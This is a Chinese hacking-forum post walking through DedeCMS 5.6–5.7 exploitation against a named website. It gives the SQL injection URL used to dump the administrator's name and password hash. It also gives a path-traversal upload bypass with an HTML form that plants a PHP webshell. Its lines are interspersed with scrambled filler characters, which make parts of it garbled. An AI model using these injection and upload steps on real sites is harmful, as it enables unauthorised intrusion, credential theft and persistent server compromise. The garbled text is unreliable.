找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms5.6-5.7注入与上传漏洞利用
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2650|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。9 c0 }2 N) B4 a! q- n9 d
这站 http://www.political-security.com/4 _7 Y9 H+ x* s- r$ A  I
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
# E; M8 `  H) ~" l  Wwww.political-security.com/data/mysql_error_trace.inc 爆后台/ Q! r7 g0 A7 Y* h1 s$ ?
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。! ^  J" M  L+ @& G* V0 c8 x
然后写上语句
' }4 o2 r) I( a: W, p! q' P6 Z) p2 Q查看管理员帐号
  L9 `  B. m" J7 q7 Chttp://www.political-security.co ... &membergroup=@`
) _! _2 c6 j8 g/ S; C
1 e, p4 P' K$ Y8 |% U2 v7 l- dadmin
5 R! @7 @+ D) d# p( v
* B" \$ c9 f2 d2 \3 d查看管理员密码# l" j# K7 j; Y$ T+ [5 l6 e, v
 http://www.political-security.co ... &membergroup=@`
- [7 w+ e0 u* H$ h  P) M* V/ t3 y2 R3 ^$ S- l  ?& t9 S
8d29b1ef9f8c5a5af429  O' R; R; C! N5 [+ Q
8 x5 X' z/ f  j# {/ ?# m' D; h3 Q) R% G9 J
查看管理员密码4 S$ c+ P' f" J5 R% s3 v& J8 h

0 c* N0 Z% y  v& Y% L+ \$ t, [得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD56 M- @: ?" V' n( ^
+ i! |9 v, u3 m4 B% o" X$ N
8d24 W! R$ j8 j# [; \- D3 r$ B
9b1ef9f8c5a5af424 @) ?6 O$ V$ [4 j0 I5 ~5 X( [
98 H. @; y3 A: q! x+ T% p

0 x3 ^/ A  u# c  V' \cmd5没解出来 只好测试第二个方法
& F0 A& ~, V4 D! T3 s3 L8 |1 i+ c  {1 ^5 n& a* i

6 X; `/ J9 o) `, G5 u1 O②上传漏洞:
. d( e- |; }5 g- _' T
) |5 m% Y; V7 B0 h- m! V6 p只要登陆会员中心,然后访问页面链接
% ^  s, P! |5 [5 ~4 q+ F  e“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”1 j4 Y% I2 |7 y5 m( R( z
5 S( M7 l9 h* c, U7 d
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”+ Q1 L9 j0 Q7 T. ]8 B

" S6 P+ y6 C; {5 J. [于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm' }" W; [! p- F  z' K- g
# Y, f8 [6 N; \- y* S! X) n4 W3 h, t
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
8 s0 O- d( [5 m$ O4 ]7 l! X或者
+ Z" k+ ~& O# N* s8 F8 R$ Y即可上传成功
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表